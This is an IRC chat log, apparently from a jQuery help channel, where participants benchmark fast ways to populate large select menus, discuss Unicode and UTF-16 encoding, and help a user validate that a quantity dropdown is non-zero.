[19:05:03] <doug64k> mattjs5: I'm guessing it reflows every time an item gets added (in case it has to make it bigger?) - and that can't happen if you .hide it
[19:05:52] <doug64k> it should go full speed without any reflows except one at the end when done
[19:06:06] <doug64k> er, and one at the beginning
[19:23:54] <doug64k> mattjs5: wow, doesn't make any difference http://jsfiddle.net/6nbhw3wL/3/
[19:24:28] <doug64k> I get about 16000 options in one second of lag. if you want to spread it out over a few ticks that would fix it completely
[19:24:43] <doug64k> firefox
[19:29:23] <__joshua__> 200ms http://jsfiddle.net/6nbhw3wL/4/
[19:30:24] <__joshua__> 50ms http://jsfiddle.net/6nbhw3wL/4/
[19:37:05] <__joshua__> 40ms http://jsfiddle.net/6nbhw3wL/10/
[19:37:10] <__joshua__> thats probably about it
[19:59:42] <doug64k> mattjs5:  http://jsfiddle.net/6nbhw3wL/13/
[20:00:20] <doug64k> mattjs5: http://jsfiddle.net/6nbhw3wL/14/
[20:04:35] <doug64k> __joshua__: that's cheating though, you can't just allow XSS security holes for speed :)
[20:05:41] <__joshua__> from the string concat?  you could, if you escape option i guess
[20:05:57] <doug64k> nice though
[20:16:01] <doug64k> __joshua__: your optimized version, but I escape the html http://jsfiddle.net/6nbhw3wL/16/
[20:16:12] <doug64k> however, if you click populate again it hangs my browser
[20:16:32] <__joshua__> i did it the dodgy way http://jsfiddle.net/6nbhw3wL/17/
[20:18:27] <doug64k> adequate
[20:18:40] <doug64k> and way faster
[20:19:05] <doug64k> notice that I lean toward correctness at the expense of speed
[20:19:49] <doug64k> my way is a hack though :)
[20:20:15] <__joshua__> oh i would never do any of these things in real life unless there was a serious usability issue
[20:30:40] <__joshua__> doug64k:  clone doesn't really seem faster http://jsfiddle.net/6nbhw3wL/22/
[20:31:57] <__joshua__> oh with debugging off im getting 30ms, so i thats a little better
[20:32:17] <doug64k> it is faster
[20:32:40] <__joshua__> I think im out of ideas
[20:34:23] <doug64k> have a 10000 option already there hidden in the dom and unhide it? :D
[20:34:37] <__joshua__> heh, now thats cheating
[20:35:28] <doug64k> the textContent trick probably gave it a decent locality boost
[20:35:46] <systemfault> What's up?
[20:35:55] <doug64k> no going off into FSA lala land in .replace :D
[20:36:06] <systemfault> What code do you need to make faster?
[20:36:43] <doug64k> systemfault:  http://jsfiddle.net/6nbhw3wL/22/
[20:37:06] <systemfault> 39ms?
[20:37:23] <doug64k> 16000 options. __joshua__ optimized it
[20:38:36] <systemfault> I think his code is optimal... the only alternative(And i'm not just it would be faster) would be to use innerHTML
[20:38:46] <doug64k> it's about 1000ms doing it unoptimized with x = $('<option/>'); y = x.clone().text(...)
[20:39:12] <__joshua__> systemfault: tried that before, about 10ms slower
[20:39:36] <__joshua__> http://jsfiddle.net/6nbhw3wL/17/
[20:39:45] <doug64k> yeah I meant whole thing totally unoptimized, making jquery make everything and append it all together
[20:44:31] <systemfault> Event with a fragment... it's not faster: http://jsfiddle.net/6nbhw3wL/24/
[20:44:36] <systemfault> *Even
[20:51:25] <doug64k> http://jsfiddle.net/6nbhw3wL/24/
[20:51:46] <doug64k> a tad sloppy but I'm tired :D
[20:52:52] <doug64k> putting the finished thing on the page takes almost half as long as building 16k objects
[20:57:41] <systemfault> It's the fastest in the newest safari
[20:57:46] <systemfault> Then firefox... and finally chrome
[21:05:50] <doug64k> I made this a while back (careful - it is hard on the browser) http://jsfiddle.net/doug65536/rewLG/
[21:07:42] <doug64k> it generates a page in the background using timeouts that has every unicode character - and I mean every one - all the way up to the last unicode character 0x10FFFF
[21:07:43] <blackkbot> oh yeah i did something like that too
[21:09:08] <doug64k> it shows the surrogate pair range to see how the browser will react
[21:09:17] <doug64k> even though those are nonsense
[21:09:37] <blackkbot> yeah i was looking to display the pentagram character
[21:10:49] <doug64k> ⛤
[21:10:56] <doug64k> but my fonts don't show anything
[21:11:07] <doug64k> http://www.fileformat.info/info/unicode/char/26e4/index.htm
[21:11:42] <blackkbot> yeah its not universal
[21:12:02] <doug64k> most of the exotic characters work in linux mint 17
[21:13:05] <blackkbot> yeah but i don't do pentagrams for myself
[21:13:15] <blackkbot> i use them for the children
[21:13:54] <doug64k> 🂡🂢🂣🂤🂥🂦🂧🂨🂩🂪🂫🂬🂭🂮  <-- if you see playing cards, your irc client handles unicode correctly
[21:14:16] <doug64k> those are above the basic multilingual plane (>= 0x10000
[21:14:59] <blackkbot> i think i see playing cards but they could also just be pound signs
[21:15:02] <doug64k> in utf-16 those require 2 characters to encode each. in js each card takes 2 characters in a string
[21:15:40] <doug64k> js> print('🂡'.length)
[21:15:40] <b-ot> doug64k: No result.
[21:15:58] <doug64k> js> print(1)
[21:16:03] <b-ot> doug64k: 1
[21:16:26] <doug64k> b-ot can't send the unicode to ideone properly I guess
[21:16:41] <doug64k> :)
[21:26:55] <Jattenalle> doug64k, http://enjoydoingitwrong.wordpress.com/2009/06/22/unicode-is-not-utf/
[21:30:33] <doug64k> Jattenalle: I know the difference
[21:36:15] <doug64k> unicode is a list of 0x110000 characters, largely unassigned. some aren't really characters, just accents. UTF-8 encodes 6 bits per byte, except the first, which encodes up to 7 bits. utf-16 doesnt do anything with bits, it assigns an escape range between 0xd800 and 0xdb7f are reserved to represent the first byte of a pair, 0xdc00 thru dfff are the second byte in the pair. surrogates encode code points >= 0x10000
[21:38:35] <doug64k> ucs4 is the name commonly given to storing of strings that are just big fat 32 bit integers with absolutely no encoding or compression
[21:39:54] <blackkbot> i thought those were just called integers
[21:40:09] <doug64k> hey are big and fat when holding a single character :D
[21:41:12] <doug64k> typically used for intermediate representation of the text for processing, mostly converted back to a more reasonable encoding when done processing
[21:41:28] <doug64k> ...and stored
[21:41:38] <blackkbot> so base64
[21:42:33] <doug64k> run this in a browser console: '🂡'.length
[21:43:03] <doug64k> it will say 2 because js uses utf-16 representation, and that character is >= 0x10000 so it needs to use a surrogate pair encoding in js
[21:43:25] <blackkbot> it infected my computer with ebola
[21:45:31] <doug64k> ucs4 would be base4294967296
[21:46:07] <doug64k> not a fake number
[21:48:43] <blackkbot> but its not more efficient than base 2 in a computer
[21:50:13] <blackkbot> since its just  32 bit number represented using a string of 16 bit characters right
[22:04:03] <amh345> i need to ensure at least one of my select options has been selected.  what is the best way to achieve this without using a select id?
[22:05:11] <blackkbot> what
[22:05:46] <amh345> i need to make sure at least one of my select menus has something selected before submitting.
[22:06:35] <blackkbot> ok so $('form select').... i don't know the function similar to [].some in jquery
[22:08:22] <amh345> hmm. not sure i follow.
[22:08:39] <blackkbot> var oneIsSelected = [].some.call(document.querySelectorAll('form select'),function(e){return e.value !==0});
[22:10:21] <VectorX> how do i set the value all inputs matching a class to say 5 ?
[22:11:03] <blackkbot> [].forEach.call(document.querySelectorAll('input.class'),function(e){e.value = 5});
[22:11:38] <blackkbot> heh using normal javascript in the jquery chan oh well
[22:12:27] <blackkbot> im pretty sure $('input.call').each(function(){$(this).value = 5}); is the jquery way
[22:12:51] <VectorX> ok
[22:13:07] <blackkbot> sheet not input.call but input.class
[22:21:04] <doug64k> blackkbot: $(this).val(5)
[22:22:51] <doug64k> var oneIsSelected = $('form select').filter(function() { $(this).val() !== 0; }).length > 0;
[22:23:14] <doug64k> oops
[22:23:24] <doug64k> var oneIsSelected = $('form select').filter(function() { return $(this).val() !== 0; }).length > 0;
[22:24:28] <doug64k> var anyAreSelected...
[22:26:25] <blackkbot> see that doesn't make sense to me
[22:26:48] <blackkbot> some means that at least 1 is true and every means that they are all true easy peasy fuctions
[22:27:31] <amh345> blackkbot: var oneIsSelected = [].some.call(document.querySelectorAll('form select'),function(e){return e.value !==0});  <<  what is [].some.call?
[22:28:08] <blackkbot> its the shortest way to call the some function from arrays on an arraylike object
[22:28:32] <blackkbot> shortest/fastest
[22:30:19] <amh345> hmm. it always returns false.  even when one of the i select an option.
[22:31:03] <amh345> maybe there's a better way to do this.
[22:31:07] <blackkbot> always
[22:31:11] <amh345> google is failing me though.
[22:31:29] <blackkbot> maybe instead of e.value !==0 just Boolean(e.value)
[22:31:33] <amh345> i guess what i need to make sure is at least one of the three select menus DOESNT contain a value of 0
[22:31:49] <blackkbot> doesnt
[22:31:57] <amh345> if all three drop downs contain 0--  then no dice.
[22:32:08] <amh345> one of them has to contain a value other than zero.
[22:32:09] <blackkbot> so instead of some use every and then e.value !==0
[22:32:14] <blackkbot> oh
[22:32:39] <blackkbot> or the selectedIndex !==0
[22:32:48] <blackkbot> idk what the select value stuff is
[22:32:55] <amh345> I've been trying to loop through them all and set a var to "true"-- but it isn't doing anything.
[22:33:57] <blackkbot> some stops executing the loop if it has a true value returned and every halts on a false value
[22:33:58] <amh345> i foolishly though this would be easy for me.
[22:34:54] <blackkbot> if you just want all of them you can use [].filter.call(document.querySelectorAll('form select'),function(e){return e.value})
[22:35:04] <blackkbot> or map
[22:35:05] <blackkbot> my bad
[22:35:34] <blackkbot> im only messing you up im sure and you are in the jquery channel so you should be using jquery rather than vanillajs
[22:35:52] <blackkbot> like im suggesting
[22:36:22] <amh345> i don't really care what I'm using at this point. i just want to get it working so i can go to bed.
[22:36:34] <blackkbot> show the code
[22:36:35] <amh345> however [].filter.call(document.querySelectorAll('form select'),function(e){return e.value}) returns  []
[22:36:37] <amh345> ok.
[22:36:57] <blackkbot> i was meaning to use [].map.call fwiw
[22:37:39] <amh345> blackkbot: here is the html. http://jsfiddle.net/8xj768y4/
[22:37:59] <amh345> i need to make sure anyone of those has a value other than 0
[22:38:09] <amh345> when i submit (the submit stuff is taken care of )
[22:38:26] <amh345> i just can't have them submitting something where nothing or 0 is selected.
[22:38:39] <amh345> if anyone one or more has a value other than 0.  it's good.
[22:41:12] <blackkbot> http://jsfiddle.net/Darbicus/8xj768y4/1/
[22:44:00] <amh345> blackkbot: i see.  is there a way to just have it return true / false?
[22:44:06] <amh345> or do i need to go through the array to check?
[22:44:07] <blackkbot> yeah its because the value is a string that has a number in it that returns a flasy value
[22:44:14] <blackkbot> falsy
[22:45:25] <blackkbot> i didn't realize selects defaulted to the first option
[22:46:13] <blackkbot> you could erase all the values in the selects  so they are blank to start and then they have to choose one and you just make sure you treat it like a string
[22:47:20] <blackkbot> http://jsfiddle.net/Darbicus/8xj768y4/3/
[22:50:14] <amh345> hmm. it's pretty cool. but it comes back as true if 0 is selected.
[22:50:22] <blackkbot> 0 is a valid choice
[22:50:24] <blackkbot> its an option
[22:50:35] <amh345> they need to have anything other than 0
[22:50:49] <amh345> the reason is you can submit an order with 0 quantity.
[22:51:10] <amh345> so i need to say. hey, you're trying to submit this but you haven't selected any of the the quants for items.
[22:51:10] <blackkbot> well why would you ever put something of 0 quanity in your shopping cart
[22:51:19] <amh345> i have no idea.  but people do it :/
[22:51:26] <blackkbot> why have zero at all
[22:51:47] <amh345> because if i have them all default to 1 and they click submit by mistake. they just bought everything.
[22:52:09] <amh345> there is an opt out option. but i can't rely on people doing that.
[22:52:10] <blackkbot> http://jsfiddle.net/Darbicus/8xj768y4/4/
[22:52:33] <amh345> at least if they are at 0 and they try to submit it'll let them know that if they wanted something. they need to select a quantity for one or all.
[22:52:37] <blackkbot> you should have a buy button for each individual item
[22:52:58] <amh345> i did. and then i client wanted it changed.  so now I'm stuck messing with this at 2am.
[22:53:08] <blackkbot> lol and checkboxes
[22:54:24] <amh345> oh. i think the one you just did works.
[22:54:28] <amh345> im testing it.
[22:55:04] <blackkbot> im not just positive it works im hiv positive it works
[22:56:04] <amh345> heh.
[22:56:17] <amh345> yeah. it worked.  thanks for pozzing it up. much appreciated.
[22:56:35] <blackkbot> ... time for the walking dead goodnight
[22:58:55] <amh345> good night.
